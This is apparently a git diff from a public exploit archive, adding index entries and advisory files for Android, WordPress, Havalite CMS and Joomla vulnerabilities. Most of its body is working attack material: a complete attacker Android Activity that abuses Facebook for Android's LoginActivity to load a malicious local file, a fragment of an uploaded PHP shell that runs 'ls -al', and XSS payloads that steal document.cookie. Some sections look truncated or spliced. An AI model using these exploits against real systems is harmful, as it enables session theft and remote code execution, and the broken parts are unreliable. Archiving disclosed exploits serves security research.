diff --git a/files.csv b/files.csv index 09cfeb195..05bbcb71a 100755 --- a/files.csv +++ b/files.csv @@ -34465,3 +34465,9 @@ id,file,description,date,author,platform,type,port 38162,platforms/php/webapps/38162.txt,"osTicket tickets.php status Parameter XSS",2013-01-02,AkaStep,php,webapps,0 38163,platforms/php/webapps/38163.txt,"WordPress Uploader Plugin Arbitrary File Upload Vulnerability",2013-01-03,"Sammy FORGIT",php,webapps,0 38164,platforms/hardware/remote/38164.py,"Belkin Wireless Router Default WPS PIN Security Vulnerability",2013-01-03,ZhaoChunsheng,hardware,remote,0 +38166,platforms/php/webapps/38166.txt,"WHMCS 5.0 Insecure Cookie Authentication Bypass Vulnerability",2012-12-31,Agd_Scorp,php,webapps,0 +38167,platforms/php/webapps/38167.php,"WordPress Multiple WPScientist Themes Arbitrary File Upload Vulnerability",2013-01-04,JingoBD,php,webapps,0 +38168,platforms/php/webapps/38168.txt,"TomatoCart 'json.php' Security Bypass Vulnerability",2013-01-04,"Aung Khant",php,webapps,0 +38169,platforms/php/webapps/38169.txt,"Havalite CMS 'comment' Parameter HTML Injection Vulnerability",2013-01-06,"Henri Salo",php,webapps,0 +38170,platforms/android/remote/38170.txt,"Facebook for Android 'LoginActivity' Information Disclosure Vulnerability",2013-01-07,"Takeshi Terada",android,remote,0 +38171,platforms/php/webapps/38171.txt,"Joomla! Incapsula Component Multiple Cross Site Scripting Vulnerabilities",2013-01-08,"Gjoko Krstic",php,webapps,0 diff --git a/platforms/android/remote/38170.txt b/platforms/android/remote/38170.txt new file mode 100755 index 000000000..dda6b3636 --- /dev/null +++ b/platforms/android/remote/38170.txt @@ -0,0 +1,92 @@ +source: http://www.securityfocus.com/bid/57173/info + +Facebook for Android is prone to an information-disclosure vulnerability. + +Successful exploits allows an attacker to gain access to sensitive information. Information obtained may aid in further attacks. + +Facebook for Android 1.8.1 is vulnerable; other versions may also be affected. + +++++++ Attacker's app (activity) ++++++ + + // notice: for a successful attack, the victim user must be logged-in + // to Facebook in advance. + public class AttackFacebook extends Activity { + + // package name of Facebook app + static final String FB_PKG = "com.facebook.katana"; + + // LoginActivity of Facebook app + static final String FB_LOGIN_ACTIVITY + = FB_PKG + ".LoginActivity"; + + // FacebookWebViewActivity of Facebook app + static final String FB_WEBVIEW_ACTIVITY + = FB_PKG + ".view.FacebookWebViewActivity"; + + @Override + public void onCreate(Bundle bundle) { + super.onCreate(bundle); + attack(); + } + + // main method + public void attack() { + // create continuation_intent to call FacebookWebViewActivity. + Intent contIntent = new Intent(); + contIntent.setClassName(FB_PKG, FB_WEBVIEW_ACTIVITY); + // URL pointing to malicious local file. + // FacebookWebViewActivity will load this URL into its WebView. + contIntent.putExtra("url", "file:///sdcard/attack.html"); + + // create intent to be sent to LoginActivity. + Intent intent = new Intent(); + intent.setClassName(FB_PKG, FB_LOGIN_ACTIVITY); + intent.putExtra("login_redirect", false); + + // put continuation_intent into extra data of the intent. + intent.putExtra(FB_PKG + ".continuation_intent", contIntent); + + // call LoginActivity + this.startActivity(intent); + } + } + + ++++++ Attacker's HTML/JavaScript file ++++++ + + + +
+';+echo `ls+-al`; ?> \ No newline at end of file diff --git a/platforms/php/webapps/38169.txt b/platforms/php/webapps/38169.txt new file mode 100755 index 000000000..c827422d2 --- /dev/null +++ b/platforms/php/webapps/38169.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/57169/info + +Havalite CMS is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input. + +Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible. + +Havalite CMS 1.1.7 is vulnerable; other versions may also be affected. + +http://www.example.com/?p=1 "comment" with value %E2%80%9C%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E \ No newline at end of file diff --git a/platforms/php/webapps/38171.txt b/platforms/php/webapps/38171.txt new file mode 100755 index 000000000..e8150c411 --- /dev/null +++ b/platforms/php/webapps/38171.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/57190/info + + +The Incapsula component for Joomla! is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +Incapsula 1.4.6_b and prior are vulnerable. + +http://www.example.com/administrator/components/com_incapsula/assets/tips/en/Security.php?token="> + +http://www.example.com/administrator/components/com_incapsula/assets/tips/en/Performance.php?token="> \ No newline at end of file